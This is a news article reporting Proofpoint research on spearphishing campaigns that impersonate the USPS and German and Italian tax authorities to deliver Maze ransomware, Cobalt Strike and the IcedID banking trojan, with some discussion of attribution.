A new scheme has seen a nefarious actor impersonating the United States Postal Service and tax entities in recent weeks in an effort to get victims in the U.S., Italy, and Germany to download and install malware, according to new research from Proofpoint.
The scheme has been trying to trick victims into clicking through spearphishing emails that contain ransomware — and at times banking trojans — by sending alerts that appear to require urgent action related to tax information. Of course, what’s really taking place is a money-making ploy, according to Proofpoint researchers.
The scheme — it’s unclear whether it’s being carried out by one person or a group — also works to trick victims by appearing to imitate government taxation entities or the USPS by using lookalike domains and branding.
In one case last month, German-based accounts were targeted with hundreds of spearphishing emails that looked to be from the German Federal Ministry of Finance (Bundeszentralamt fur Steuern). The note mentioned a 2019 tax refund worth several hundred euros. The note then urged victims to submit a refund request using an attacker-manipulated Microsoft Word document, which, if opened, would install Maze ransomware to the victim’s system.
The Maze ransomware campaign, which primarily targeted information technology services companies in Germany, would encrypt victims’ files and display a ransom note demanding various amounts, sometimes in the hundreds of euros.
The actor repeated this infection chain in another campaign that impersonated the German internet service provider, 1&1 Internet AG, in hundreds of spearphishing emails early this month.
In some of the German-focused campaigns, the malicious attachments would execute a Microsoft Office macro, which would run a PowerShell script to download Cobalt Strike, a commercially licensed software tool meant to act as a penetration testing tool.
Germany’s IT sector is not alone — the actor launched a similar spearphishing operation using malicious Microsoft Word documents against Italian entities in late October. This time, the group sent a fake alert to victims that impersonated the Italian Ministry of Taxation (Agenzia Entrate), prompting them to read an attached document to avoid tax penalties.
The ultimate goal of this spearphising campaign, which targeted entities in the manufacturing sector, was once again to compel victims to download Maze ransomware.
Just this Tuesday the actor has expanded its scheme to include U.S. targets, according to Proofpoint. The attackers sent thousands of emails to entities in the healthcare sector with a fake unsuccessful delivery notice from USPS. Instead of ransomware, the attackers are trying to lure victims to install the banking trojan known as IcedID.
Russian language evidence
Although it was not immediately clear to researchers who is behind the schemes, Proofpoint Threat Intelligence Lead Christopher Dawson told CyberScoop there are some clues in the attackers’ infrastructure.
“There is some evidence based on observed infrastructure that the actor is Russian-speaking,” Dawson said.
Other clues may lie in the payloads being used.
APT32, a group which typically targets companies that relate to business interests in Vietnam, has used Cobalt Strike in the past, for instance. Also known as OceanLotus, the group primarily targets victims in the manufacturing and hospitality sectors, much like this new cybercriminal group.
Another group that has been linked with the Chinese government that also tends to target the manufacturing sector, APT19, and Cobalt Group, which targets financial entities, have also used Cobalt Strike in the past.
For now, there is no evidence that these groups are behind this scheme, however, Dawson said.
“Based on a number of characteristics and TTPs including sending infrastructure, lure styles, macro code, and more, we have not uncovered any overlap with those of existing actors,” Dawson told CyberScoop.
Although Proofpoint would not disclose how many companies in total have been targeted in this scheme so far, Dawson noted in a statement that the campaigns “are significant … for their relatively rapid expansion across multiple geographies.” Proofpoint said it will continue to monitor for campaigns from the new cybercriminal actor.